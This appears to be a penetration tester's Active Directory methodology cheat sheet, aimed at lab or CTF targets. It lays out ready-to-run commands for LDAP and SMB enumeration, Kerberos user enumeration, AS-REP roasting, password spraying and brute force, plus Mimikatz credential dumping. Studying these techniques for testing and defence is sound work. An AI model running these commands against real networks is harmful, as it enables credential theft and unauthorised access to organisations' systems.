AD enum and hacking write ups                   

Ad enum and exploit: https://medium.com/@navkang/active-directory-enumeration-and-exploitation-for-beginners-604a32f45011

Attacking Kerberos: https://medium.com/@navkang/attacking-kerberos-e2b1be3dbbe9

Post Exploit: https://medium.com/@navkang/post-exploitation-windows-ad-2e608c7858dc

AD ROADMAP

§  DNSquery  -nslookup IP IP – then follow up by dig afxr

§  Nmap scan – AD set – make note of remote ports, webservers, smb-ldap ports

§  Enum4linux/smbclient – every box with no creds – does it list shares? And more

§  /etc/hosts – add domain to it when you find one

§  Ldapsearch – start general, dig deeper to find creds/users

§  Remote AD tools:

o  Kerbrute – for username enum – password spray (crackmap too)

o  GetNPUsers.py

o  GetUserSPNs.py

§  Try psexec/evil win rm – if you have found creds (log into web portal try to escalate priv further)

§  ONCE IN! ENUMERATE HARDERS

§  Bloodhound (sharphound) – fantastic enumeration

§  Mimikatz – upload it – try to get hashes/PTT/OPTH

§  Use crackmapexec to test any usernames, if come back positive log in via RDP

§  RDP/evil win rm – or TRY SSH and SMBCLIENT!

§  Verify any creds you have!

§  Repeat process when you get into any  new box with a new user

 

Bloodhound/neo4j are extremely invaluable tools!

Other tools needed:

Impacket (some below are included within impacket)

Ldapsearch

Ldapdomaindump

Mimikatz

Secretsdump.py

Kerbrute

 

 

Hacking methodology

 

Initial stages:

enumerate dns: gobuster dns -d domain.local -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

 

nmap -n -sV --script "ldap* and not brute" -p 389 <DC IP>

ldapsearch -check if allows anonymous ldap bind

ldapsearch -h 10.10.10.10 -p 389 -x -b "dc=xxx,dc=xxx" (-x = anonymous)

 

 

 

then use windapsearch to enumerate further:

windapsearch.py -d xxx.xxx --dc-ip 10.10.10.10 -U  (-U = enumrate all users)

 

null and guest access:

enum4linux -a -u "" -p "" <DC IP> && enum4linux -a -u "guest" -p "" <DC IP>

smbmap -u "" -p "" -P 445 -H <DC IP> && smbmap -u "guest" -p "" -P 445 -H <DC IP>

smbclient -U '%' -L //<DC IP> && smbclient -U 'guest%' -L //

 

user enum: unvalid usernames = KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN

./kerbrute_linux_amd64 userenum -d lab.ropnop.com --dc 10.10.10.10 usernames.txt

nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN'" <IP>

Nmap -p 88 --script=krb5-enum-users --script-args krb5-enum-users.realm='<domain>',userdb=/root/Desktop/usernames.txt <IP>

 

if you know one or more usernames but no passwords:

ASREPRoast or Password spray:

 

ASREPRoast: using linux

#Try all the usernames in usernames.txt

python GetNPUsers.py jurassic.park/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast

 

#Use domain creds to extract targets and target them

python GetNPUsers.py jurassic.park/triceratops:Sh4rpH0rns -request -format hashcat -outputfile hashes.asreproast

 

using Windows:

.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.asreproast [/user:username]

Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github.com/HarmJ0y/ASREPRoast)

 

 

Password spraying: Kali

crackmapexec smb <IP> -u users.txt -p passwords.txt

# Local Auth Spray (once you found some local admin pass or hash)

## --local-auth flag indicate to only try 1 time per machine

crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +

 

kerbrute:

# Password Spraying

./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123

# Brute-Force

./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

 

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/

for u in $(cat users.txt); do

    rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;

done

 

 

Password spraying: Windows:

# with a list of users

.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

 

# check passwords for all users in current domain

.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

 

 

To get foothold:

use getNPUsers to request TGT ticket and dump hash

GETNPUsers.py xxx.xxx/svc-user -dc-ip 10.10.10.10 -no-pass

 

 

PORTS:

Ldap ports - 389

RDP WINRM ports -3389, 5985

Rpc ports – use RPC tools

Smb ports – use SMB tools

DNS – 53

Kerberos- 88

ADWS – 9389

Global Catalog – 3268-9